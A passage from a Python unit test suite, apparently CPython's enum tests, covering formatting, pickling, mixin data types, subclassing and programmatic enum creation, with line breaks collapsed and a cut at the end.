self.assertFormatIsValue('{:n}', Konstants.TAU) self.assertFormatIsValue('{:5.2}', Konstants.TAU) self.assertFormatIsValue('{:f}', Konstants.TAU) def test_format_enum_int(self): class Grades(int, Enum): A = 5 B = 4 C = 3 D = 2 F = 0 self.assertFormatIsValue('{}', Grades.C) self.assertFormatIsValue('{:}', Grades.C) self.assertFormatIsValue('{:20}', Grades.C) self.assertFormatIsValue('{:^20}', Grades.C) self.assertFormatIsValue('{:>20}', Grades.C) self.assertFormatIsValue('{:<20}', Grades.C) self.assertFormatIsValue('{:+}', Grades.C) self.assertFormatIsValue('{:08X}', Grades.C) self.assertFormatIsValue('{:b}', Grades.C) def test_format_enum_str(self): Directional = self.Directional self.assertFormatIsValue('{}', Directional.WEST) self.assertFormatIsValue('{:}', Directional.WEST) self.assertFormatIsValue('{:20}', Directional.WEST) self.assertFormatIsValue('{:^20}', Directional.WEST) self.assertFormatIsValue('{:>20}', Directional.WEST) self.assertFormatIsValue('{:<20}', Directional.WEST) def test_object_str_override(self): class Colors(Enum): RED, GREEN, BLUE = 1, 2, 3 def __repr__(self): return "test.%s" % (self._name_, ) __str__ = object.__str__ self.assertEqual(str(Colors.RED), 'test.RED') def test_enum_str_override(self): class MyStrEnum(Enum): def __str__(self): return 'MyStr' class MyMethodEnum(Enum): def hello(self): return 'Hello! My name is %s' % self.name class Test1Enum(MyMethodEnum, int, MyStrEnum): One = 1 Two = 2 self.assertTrue(Test1Enum._member_type_ is int) self.assertEqual(str(Test1Enum.One), 'MyStr') self.assertEqual(format(Test1Enum.One, ''), 'MyStr') # class Test2Enum(MyStrEnum, MyMethodEnum): One = 1 Two = 2 self.assertEqual(str(Test2Enum.One), 'MyStr') self.assertEqual(format(Test1Enum.One, ''), 'MyStr') def test_inherited_data_type(self): class HexInt(int): def __repr__(self): return hex(self) class MyEnum(HexInt, enum.Enum): A = 1 B = 2 C = 3 def __repr__(self): return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_) self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>') # class SillyInt(HexInt): __qualname__ = 'SillyInt' pass class MyOtherEnum(SillyInt, enum.Enum): __qualname__ = 'MyOtherEnum' D = 4 E = 5 F = 6 self.assertIs(MyOtherEnum._member_type_, SillyInt) globals()['SillyInt'] = SillyInt globals()['MyOtherEnum'] = MyOtherEnum test_pickle_dump_load(self.assertIs, MyOtherEnum.E) test_pickle_dump_load(self.assertIs, MyOtherEnum) # # This did not work in 3.9, but does now with pickling by name class UnBrokenInt(int): __qualname__ = 'UnBrokenInt' def __new__(cls, value): return int.__new__(cls, value) class MyUnBrokenEnum(UnBrokenInt, Enum): __qualname__ = 'MyUnBrokenEnum' G = 7 H = 8 I = 9 self.assertIs(MyUnBrokenEnum._member_type_, UnBrokenInt) self.assertIs(MyUnBrokenEnum(7), MyUnBrokenEnum.G) globals()['UnBrokenInt'] = UnBrokenInt globals()['MyUnBrokenEnum'] = MyUnBrokenEnum test_pickle_dump_load(self.assertIs, MyUnBrokenEnum.I) test_pickle_dump_load(self.assertIs, MyUnBrokenEnum) def test_too_many_data_types(self): with self.assertRaisesRegex(TypeError, 'too many data types'): class Huh(str, int, Enum): One = 1 class MyStr(str): def hello(self): return 'hello, %s' % self class MyInt(int): def repr(self): return hex(self) with self.assertRaisesRegex(TypeError, 'too many data types'): class Huh(MyStr, MyInt, Enum): One = 1 def test_value_auto_assign(self): class Some(Enum): def __new__(cls, val): return object.__new__(cls) x = 1 y = 2 self.assertEqual(Some.x.value, 1) self.assertEqual(Some.y.value, 2) def test_hash(self): Season = self.Season dates = {} dates[Season.WINTER] = '1225' dates[Season.SPRING] = '0315' dates[Season.SUMMER] = '0704' dates[Season.AUTUMN] = '1031' self.assertEqual(dates[Season.AUTUMN], '1031') def test_intenum_from_scratch(self): class phy(int, Enum): pi = 3 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_intenum_inherited(self): class IntEnum(int, Enum): pass class phy(IntEnum): pi = 3 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_floatenum_from_scratch(self): class phy(float, Enum): pi = 3.1415926 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_floatenum_inherited(self): class FloatEnum(float, Enum): pass class phy(FloatEnum): pi = 3.1415926 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_strenum_from_scratch(self): class phy(str, Enum): pi = 'Pi' tau = 'Tau' self.assertTrue(phy.pi < phy.tau) def test_strenum_inherited_methods(self): class phy(StrEnum): pi = 'Pi' tau = 'Tau' self.assertTrue(phy.pi < phy.tau) self.assertEqual(phy.pi.upper(), 'PI') self.assertEqual(phy.tau.count('a'), 1) def test_intenum(self): class WeekDay(IntEnum): SUNDAY = 1 MONDAY = 2 TUESDAY = 3 WEDNESDAY = 4 THURSDAY = 5 FRIDAY = 6 SATURDAY = 7 self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c') self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2]) lst = list(WeekDay) self.assertEqual(len(lst), len(WeekDay)) self.assertEqual(len(WeekDay), 7) target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY' target = target.split() for i, weekday in enumerate(target, 1): e = WeekDay(i) self.assertEqual(e, i) self.assertEqual(int(e), i) self.assertEqual(e.name, weekday) self.assertIn(e, WeekDay) self.assertEqual(lst.index(e)+1, i) self.assertTrue(0 < e < 8) self.assertIs(type(e), WeekDay) self.assertIsInstance(e, int) self.assertIsInstance(e, Enum) def test_intenum_duplicates(self): class WeekDay(IntEnum): SUNDAY = 1 MONDAY = 2 TUESDAY = TEUSDAY = 3 WEDNESDAY = 4 THURSDAY = 5 FRIDAY = 6 SATURDAY = 7 self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY) self.assertEqual(WeekDay(3).name, 'TUESDAY') self.assertEqual([k for k,v in WeekDay.__members__.items() if v.name != k], ['TEUSDAY', ]) def test_intenum_from_bytes(self): self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE) with self.assertRaises(ValueError): IntStooges.from_bytes(b'\x00\x05', 'big') def test_floatenum_fromhex(self): h = float.hex(FloatStooges.MOE.value) self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE) h = float.hex(FloatStooges.MOE.value + 0.01) with self.assertRaises(ValueError): FloatStooges.fromhex(h) def test_pickle_enum(self): if isinstance(Stooges, Exception): raise Stooges test_pickle_dump_load(self.assertIs, Stooges.CURLY) test_pickle_dump_load(self.assertIs, Stooges) def test_pickle_int(self): if isinstance(IntStooges, Exception): raise IntStooges test_pickle_dump_load(self.assertIs, IntStooges.CURLY) test_pickle_dump_load(self.assertIs, IntStooges) def test_pickle_float(self): if isinstance(FloatStooges, Exception): raise FloatStooges test_pickle_dump_load(self.assertIs, FloatStooges.CURLY) test_pickle_dump_load(self.assertIs, FloatStooges) def test_pickle_enum_function(self): if isinstance(Answer, Exception): raise Answer test_pickle_dump_load(self.assertIs, Answer.him) test_pickle_dump_load(self.assertIs, Answer) def test_pickle_enum_function_with_module(self): if isinstance(Question, Exception): raise Question test_pickle_dump_load(self.assertIs, Question.who) test_pickle_dump_load(self.assertIs, Question) def test_enum_function_with_qualname(self): if isinstance(Theory, Exception): raise Theory self.assertEqual(Theory.__qualname__, 'spanish_inquisition') def test_class_nested_enum_and_pickle_protocol_four(self): # would normally just have this directly in the class namespace class NestedEnum(Enum): twigs = 'common' shiny = 'rare' self.__class__.NestedEnum = NestedEnum self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__ test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs) def test_pickle_by_name(self): class ReplaceGlobalInt(IntEnum): ONE = 1 TWO = 2 ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_global_name for proto in range(HIGHEST_PROTOCOL): self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO') def test_exploding_pickle(self): BadPickle = Enum( 'BadPickle', 'dill sweet bread-n-butter', module=__name__) globals()['BadPickle'] = BadPickle # now break BadPickle to test exception raising enum._make_class_unpicklable(BadPickle) test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill) test_pickle_exception(self.assertRaises, PicklingError, BadPickle) def test_string_enum(self): class SkillLevel(str, Enum): master = 'what is the sound of one hand clapping?' journeyman = 'why did the chicken cross the road?' apprentice = 'knock, knock!' self.assertEqual(SkillLevel.apprentice, 'knock, knock!') def test_getattr_getitem(self): class Period(Enum): morning = 1 noon = 2 evening = 3 night = 4 self.assertIs(Period(2), Period.noon) self.assertIs(getattr(Period, 'night'), Period.night) self.assertIs(Period['morning'], Period.morning) def test_getattr_dunder(self): Season = self.Season self.assertTrue(getattr(Season, '__eq__')) def test_iteration_order(self): class Season(Enum): SUMMER = 2 WINTER = 4 AUTUMN = 3 SPRING = 1 self.assertEqual( list(Season), [Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING], ) def test_reversed_iteration_order(self): self.assertEqual( list(reversed(self.Season)), [self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER, self.Season.SPRING] ) def test_programmatic_function_string(self): SummerMonth = Enum('SummerMonth', 'june july august') lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_with_start(self): SummerMonth = Enum('SummerMonth', 'june july august', start=10) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 10): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_list(self): SummerMonth = Enum('SummerMonth', ['june', 'july', 'august']) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_list_with_start(self): SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 20): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_iterable(self): SummerMonth = Enum( 'SummerMonth', (('june', 1), ('july', 2), ('august', 3)) ) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_from_dict(self): SummerMonth = Enum( 'SummerMonth', OrderedDict((('june', 1), ('july', 2), ('august', 3))) ) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type(self): SummerMonth = Enum('SummerMonth', 'june july august', type=int) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_with_start(self): SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 30): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_from_subclass(self): SummerMonth = IntEnum('SummerMonth', 'june july august') lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_from_subclass_with_start(self): SummerMonth = IntEnum('SummerMonth', 'june july august', start=40) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 40): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_subclassing(self): if isinstance(Name, Exception): raise Name self.assertEqual(Name.BDFL, 'Guido van Rossum') self.assertTrue(Name.BDFL, Name('Guido van Rossum')) self.assertIs(Name.BDFL, getattr(Name, 'BDFL')) test_pickle_dump_load(self.assertIs, Name.BDFL) def test_extending(self): class Color(Enum): red = 1 green = 2 blue = 3 with self.assertRaises(TypeError): class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"): class EvenMoreColor(Color, IntEnum): chartruese = 7 def test_exclude_methods(self): class whatever(Enum): this = 'that' these = 'those' def really(self): return 'no, not %s' % self.value self.assertIsNot(type(whatever.really), whatever) self.assertEqual(whatever.this.really(), 'no, not that') def test_wrong_inheritance_order(self): with self.assertRaises(TypeError): class Wrong(Enum, str): NotHere = 'error before this point' def test_intenum_transitivity(self): class number(IntEnum): one = 1 two = 2 three = 3 class numero(IntEnum): uno = 1 dos = 2 tres = 3 self.assertEqual(number.one, numero.uno) self.assertEqual(number.two, numero.dos) self.assertEqual(number.three, numero.tres) def test_wrong_enum_in_call(self): class Monochrome(Enum): black = 0 white = 1 class Gender(Enum): male = 0 female = 1 self.assertRaises(ValueError, Monochrome, Gender.male) def test_wrong_enum_in_mixed_call(self): class Monochrome(IntEnum): black = 0 white = 1 class Gender(Enum): male = 0 female = 1 self.assertRaises(ValueError, Monochrome, Gender.male) def test_mixed_enum_in_call_1(self): class Monochrome(IntEnum): black = 0 white = 1 class Gender(IntEnum): male = 0 female = 1 self.assertIs(Monochrome(Gender.female), Monochrome.white) def test_mixed_enum_in_call_2(self): class Monochrome(Enum): black = 0 white = 1 class Gender(IntEnum): male = 0 female = 1 self.assertIs(Monochrome(Gender.male), Monochrome.black) def test_flufl_enum(self): class Fluflnum(Enum): def __int__(self): return int(self.value) class MailManOptions(Fluflnum): option1 = 1 option2 = 2 option3 = 3 self.assertEqual(int(MailManOptions.option1), 1) def test_introspection(self): class Number(IntEnum): one = 100 two = 200 self.assertIs(Number.one._member_type_, int) self.assertIs(Number._member_type_, int) class String(str, Enum): yarn = 'soft' rope = 'rough' wire = 'hard' self.assertIs(String.yarn._member_type_, str) self.assertIs(String._member_type_, str) class Plain(Enum): vanilla = 'white' one = 1 self.assertIs(Plain.vanilla._member_type_, object) self.assertIs(Plain._member_type_, object) def test_no_such_enum_member(self): class Color(Enum): red = 1 green = 2 blue = 3 with self.assertRaises(ValueError): Color(4) with self.assertRaises(KeyError): Color['chartreuse'] def test_new_repr(self): class Color(Enum): red = 1 green = 2 blue = 3 def __repr__(self): return "don't you just love shades of %s?" % self.name self.assertEqual( repr(Color.blue), "don't you just love shades of blue?", ) def test_inherited_repr(self): class MyEnum(Enum): def __repr__(self): return "My name is %s." % self.name class MyIntEnum(int, MyEnum): this = 1 that = 2 theother = 3 self.assertEqual(repr(MyIntEnum.that), "My name is that.") def test_multiple_mixin_mro(self): class auto_enum(type(Enum)): def __new__(metacls, cls, bases, classdict): temp = type(classdict)() temp._cls_name = cls names = set(classdict._member_names) i = 0 for k in classdict._member_names: v = classdict[k] if v is Ellipsis: v = i else: i = v i += 1 temp[k] = v for k, v in classdict.items(): if k not in names: temp[k] = v return super(auto_enum, metacls).__new__( metacls, cls, bases, temp) class AutoNumberedEnum(Enum, metaclass=auto_enum): pass class AutoIntEnum(IntEnum, metaclass=auto_enum): pass class TestAutoNumber(AutoNumberedEnum): a = ... b = 3 c = ... class TestAutoInt(AutoIntEnum): a = ... b = 3 c = ... def test_subclasses_with_getnewargs(self): class NamedInt(int): __qualname__ = 'NamedInt' # needed for pickle protocol 4 def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __getnewargs__(self): return self._args @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp, ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' # needed for pickle protocol 4 x = ('the-x', 1) y = ('the-y', 2) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_getnewargs_ex(self): class NamedInt(int): __qualname__ = 'NamedInt' # needed for pickle protocol 4 def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __getnewargs_ex__(self): return self._args, {} @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp, ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' # needed for pickle protocol 4 x = ('the-x', 1) y = ('the-y', 2) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_reduce(self): class NamedInt(int): __qualname__ = 'NamedInt' # needed for pickle protocol 4 def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __reduce__(self): return self.__class__, self._args @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp, ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' # needed for pickle protocol 4 x = ('the-x', 1) y = ('the-y', 2) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_reduce_ex(self): class NamedInt(int): __qualname__ = 'NamedInt' # needed for pickle protocol 4 def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __reduce_ex__(self, proto): return self.__class__, self._args @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp, ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' # needed for pickle protocol 4 x = ('the-x', 1) y = ('the-y', 2) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_without_direct_pickle_support(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = ('the-x', 1) y = ('the-y', 2) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_direct_pickle_support(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp, ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = ('the-x', 1) y = ('the-y', 2) def __reduce_ex__(self, proto): return getattr, (self.__class__, self._name_) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_tuple_subclass(self): class SomeTuple(tuple, Enum): __qualname__ = 'SomeTuple' # needed for pickle protocol 4 first = (1, 'for the money') second = (2, 'for the show') third = (3, 'for the music') self.assertIs(type(SomeTuple.first), SomeTuple) self.assertIsInstance(SomeTuple.second, tuple) self.assertEqual(SomeTuple.third, (3, 'for the music')) globals()['SomeTuple'] = SomeTuple test_pickle_dump_load(self.assertIs, SomeTuple.first) def test_duplicate_values_give_unique_enum_items(self): class AutoNumber(Enum): first = () second = () third = () def __new__(cls): value = len(cls.__members__) + 1 obj = object.__new__(cls) obj._value_ = value return obj def __int__(self): return int(self._value_) self.assertEqual( list(AutoNumber), [AutoNumber.first, AutoNumber.second, AutoNumber.third], ) self.assertEqual(int(AutoNumber.second), 2) self.assertEqual(AutoNumber.third.value, 3) self.assertIs(AutoNumber(1), AutoNumber.first) def test_inherited_new_from_enhanced_enum(self): class AutoNumber(Enum): def __new__(cls): value = len(cls.__members__) + 1 obj = object.__new__(cls) obj._value_ = value return obj def __int__(self): return int(self._value_) class Color(AutoNumber): red = () green = () blue = () self.assertEqual(list(Color), [Color.red, Color.green, Color.blue]) self.assertEqual(list(map(int, Color)), [1, 2, 3]) def test_inherited_new_from_mixed_enum(self): class AutoNumber(IntEnum): def __new__(cls): value = len(cls.__members__) + 1 obj = int.__new__(cls, value) obj._value_ = value return obj class Color(AutoNumber): red = () green = () blue = () self.assertEqual(list(Color), [Color.red, Color.green, Color.blue]) self.assertEqual(list(map(int, Color)), [1, 2, 3]) def test_equality(self): class OrdinaryEnum(Enum): a = 1 self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a) self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ) def test_ordered_mixin(self): class OrderedEnum(Enum): def __ge__(self, other): if self.__class__ is other.__class__: return self._value_ >= other._value_ return NotImplemented def __gt__(self, other): if self.__class__ is other.__class__: return self._value_ > other._value_ return NotImplemented def __le__(self, other): if self.__class__ is other.__class__: return self._value_ <= other._value_ return NotImplemented def __lt__(self, other): if self.__class__ is other.__class__: return self._value_ < other._value_ return NotImplemented class Grade(OrderedEnum): A = 5 B = 4 C = 3 D = 2 F = 1 self.assertGreater(Grade.A, Grade.B) self.assertLessEqual(Grade.F, Grade.C) self.assertLess(Grade.D, Grade.A) self.assertGreaterEqual(Grade.B, Grade.B) self.assertEqual(Grade.B, Grade.B) self.assertNotEqual(Grade.C, Grade.D) def test_extending2(self): class Shade(Enum): def shade(self): print(self.name) class Color(Shade): red = 1 green = 2 blue = 3 with self.assertRaises(TypeError): class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 def test_extending3(self): class Shade(Enum): def shade(self): return self.name class Color(Shade): def hex(self): return '%s hexlified!' % self.value class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!') def test_subclass_duplicate_name(self): class Base(Enum): def test(self): pass class Test(Base): test = 1 self.assertIs(type(Test.test), Test) def test_subclass_duplicate_name_dynamic(self): from types import DynamicClassAttribute class Base(Enum): @DynamicClassAttribute def test(self): return 'dynamic' class Test(Base): test = 1 self.assertEqual(Test.test.test, 'dynamic') class Base2(Enum): @enum.property def flash(self): return 'flashy dynamic' class Test(Base2): flash = 1 self.assertEqual(Test.flash.flash, 'flashy dynamic') def test_no_duplicates(self): class UniqueEnum(Enum): def __init__(self, *args): cls = self.__class__ if any(self.value == e.value for e in cls): a = self.name e = cls(self.value).name raise ValueError( "aliases not allowed in UniqueEnum: %r --> %r" % (a, e) ) class Color(UniqueEnum): red = 1 green = 2 blue = 3 with self.assertRaises(ValueError): class Color(UniqueEnum): red = 1 green = 2 blue = 3 grene = 2 def test_init(self): class Planet(Enum): MERCURY = (3.303e+23, 2.4397e6) VENUS = (4.869e+24, 6.0518e6) EARTH = (5.976e+24, 6.37814e6) MARS = (6.421e+23, 3.3972e6) JUPITER = (1.9e+27, 7.1492e7) SATURN = (5.688e+26, 